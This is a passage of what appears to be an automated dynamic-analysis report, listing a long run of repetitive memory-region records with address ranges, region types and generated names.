8091 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8092 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 8093 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 8094 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8095 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8096 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 8097 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 8098 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8099 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8100 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 8101 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 8102 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8103 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8104 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 8105 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 8106 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8107 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8108 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 8109 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 8110 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8111 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8112 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 8113 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 8114 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8115 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8116 start_va = 0x400000 end_va = 0x402fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8117 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 8118 start_va = 0x2240000 end_va = 0x2261fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 8119 start_va = 0x2760000 end_va = 0x277bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 8120 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8121 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8122 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 8123 start_va = 0x2760000 end_va = 0x277bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 8124 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8125 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8126 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 8127 start_va = 0x2760000 end_va = 0x277bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 8128 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8129 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8130 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 8131 start_va = 0x2760000 end_va = 0x277bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 8132 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8133 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8134 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 8135 start_va = 0x2760000 end_va = 0x277bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 8136 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8137 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8138 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 8139 start_va = 0x2760000 end_va = 0x277bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 8140 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8141 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8142 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 8143 start_va = 0x2760000 end_va = 0x277bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 8144 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8145 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8146 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 8147 start_va = 0x2760000 end_va = 0x277bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 8148 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8149 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8150 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 8151 start_va = 0x2760000 end_va = 0x277bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 8152 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8153 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8154 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 8155 start_va = 0x2760000 end_va = 0x277bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 8156 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8157 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8158 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 8159 start_va = 0x2760000 end_va = 0x277bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 8160 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8161 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8162 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 8163 start_va = 0x2760000 end_va = 0x277bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 8164 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8165 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8166 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 8167 start_va = 0x2760000 end_va = 0x277bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 8168 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8169 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8170 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 8171 start_va = 0x2760000 end_va = 0x277bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 8172 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8173 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8174 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 8175 start_va = 0x2760000 end_va = 0x277bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 8176 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8177 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8178 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 8179 start_va = 0x2760000 end_va = 0x277bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 8180 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8181 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8182 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 8183 start_va = 0x2760000 end_va = 0x277bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 8184 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8185 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8186 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 8187 start_va = 0x2760000 end_va = 0x277bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 8188 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8189 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8190 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 8191 start_va = 0x2760000 end_va = 0x277bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 8192 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8193 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8194 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 8195 start_va = 0x2760000 end_va = 0x277bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 8196 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8197 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8198 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 8199 start_va = 0x2760000 end_va = 0x277bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 8200 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8201 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8202 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 8203 start_va = 0x2760000 end_va = 0x277bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 8204 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8205 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8206 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 8207 start_va = 0x2760000 end_va = 0x277bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 8208 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8209 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8210 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 8211 start_va = 0x2760000 end_va = 0x277bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 8212 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8213 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8214 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 8215 start_va = 0x2760000 end_va = 0x277bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 8216 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8217 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8218 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 8219 start_va = 0x2760000 end_va = 0x277bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 8220 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8221 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8222 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 8223 start_va = 0x2760000 end_va = 0x277bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 8224 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8225 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8226 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 8227 start_va = 0x2760000 end_va = 0x277bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 8228 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8229 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8230 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 8231 start_va = 0x2760000 end_va = 0x277bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 8232 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8233 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8234 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 8235 start_va = 0x2760000 end_va = 0x277bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 8236 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8237 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8238 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 8239 start_va = 0x2760000 end_va = 0x277bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 8240 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8241 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8242 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 8243 start_va = 0x2760000 end_va = 0x277bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 8244 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8245 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8246 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 8247 start_va = 0x2760000 end_va = 0x277bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 8248 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8249 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8250 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 8251 start_va = 0x2760000 end_va = 0x277bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 8252 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8253 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8254 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 8255 start_va = 0x2760000 end_va = 0x277bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 8256 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8257 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8258 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 8259 start_va = 0x2760000 end_va = 0x277bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 8260 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8261 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8262 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 8263 start_va = 0x2760000 end_va = 0x277bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 8264 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8265 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8266 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 8267 start_va = 0x2760000 end_va = 0x277bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 8268 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8269 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8270 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 8271 start_va = 0x2760000 end_va = 0x277bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 8272 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8273 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8274 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8275 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 8276 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8277 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8278 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8279 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 8280 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8281 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8282 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8283 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 8284 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8285 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8286 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8287 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 8288 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8289 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8290 start_va = 0x400000 end_va = 0x40ffff monitored = 